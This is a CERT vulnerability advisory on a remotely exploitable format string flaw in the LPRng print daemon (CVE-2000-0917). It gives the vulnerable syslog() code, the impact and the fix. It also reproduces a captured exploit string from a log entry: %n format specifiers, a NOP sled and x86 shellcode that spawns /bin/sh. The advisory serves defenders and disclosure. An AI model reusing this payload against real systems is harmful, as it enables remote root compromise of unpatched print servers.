|
|
|
View Notes By
|
|
|
|
Other Documents
|
|
|
|
|
Vulnerability Note VU#382365
LPRng can pass user-supplied input as a format string parameter to syslog() calls
OverviewA popular replacement software package to the BSD lpd printing service called LPRng contains at least one software defect known as a "format string vulnerability" which may allow remote users to execute arbitrary code on vulnerable systems. The privileges of such code will probably be root-level.
I. DescriptionLPRng, the "next generation" of print-service management software now being packaged in several open-source operating system distributions, has a missing format string argument in at least two calls to the syslog() function. Missing format strings in function calls which allow user-supplied arguments to be passed to a susceptible *snprintf() function call may allow remote users with access to the printer port (port 515/tcp) to pass format-string parameters that can overwrite arbitrary addresses in the printing service's address space. Such overwriting can cause segmentation violations leading to denial of printing services or lead to the execution of arbitrary code injected through other means into the memory segments of the printer service.
The vulnerable calls in this case occur in the following section of code:
LPRng-3.6.24/src/common/errormsg.c, use_syslog()
---
static void use_syslog(int kind, char *msg)
[...]
# ifdef HAVE_OPENLOG
/* use the openlog facility */
openlog(Name, LOG_PID | LOG_NOWAIT, SYSLOG_FACILITY );
syslog(kind, msg);
closelog();
# else
(void) syslog(SYSLOG_FACILITY | kind, msg);
# endif /* HAVE_OPENLOG */
[...]
Sample syslog entries from exploitation of this vulnerability:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
II. ImpactA remote user may be able to execute arbitrary code or perpetuate a denial of service. The privileges the malicious code would have depends on whether the print daemon drops it's root privileges before or after the calls to the vulnerable syslog() functions.
III. SolutionUpgrade to non-vulnerable version of LPRng (3.6.25), as described in the vendors sections below.
Disallow access to printer service ports (typically 515/tcp) using firewall or packet-filtering technologies.
Systems Affected
References
https://www.kb.cert.org/vuls/id/382365
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
http://www.securityfocus.com/bid/1712
http://www.ciac.org/ciac/bulletins/l-004.shtml
http://www.ciac.org/ciac/bulletins/l-025.shtml
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=17756
http://www.securityfocus.com/archive/1/85002
http://archives.neohapsis.com/archives/bugtraq/2000-09/0293.html
http://xforce.iss.net/static/5287.php
http://www.redhat.com/support/errata/RHSA-2000-065.html
http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/LPRng-3.6.24-1tr.i586.rpm
http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
http://lists.debian.org/debian-security-0011/msg00212.html
http://rpmfind.net/linux/RPM/redhat/7.0/updates/i386/LPRng-3.6.24-2.i386.html
http://www.egroups.com/message/lprng/6915
http://www.sans.org/newlook/alerts/port515.htm
Credit
Thanks to Chris Evans for making this code sample public.
This document was written by Jeffrey S Havrilla.
Other Information
| Date Public | 09/25/2000 |
| Date First Published | 12/04/2000 11:39:14 AM |
| Date Last Updated | 01/27/2003 |
| CERT Advisory | CA-2000-22 |
| CVE Name | CVE-2000-0917 |
| US-CERT Technical Alerts | |
| Metric | 48.20 |
| Document Revision | 41 |
If you have feedback, comments, or additional information about this vulnerability, please send us
email.
|
|
Get Adobe Reader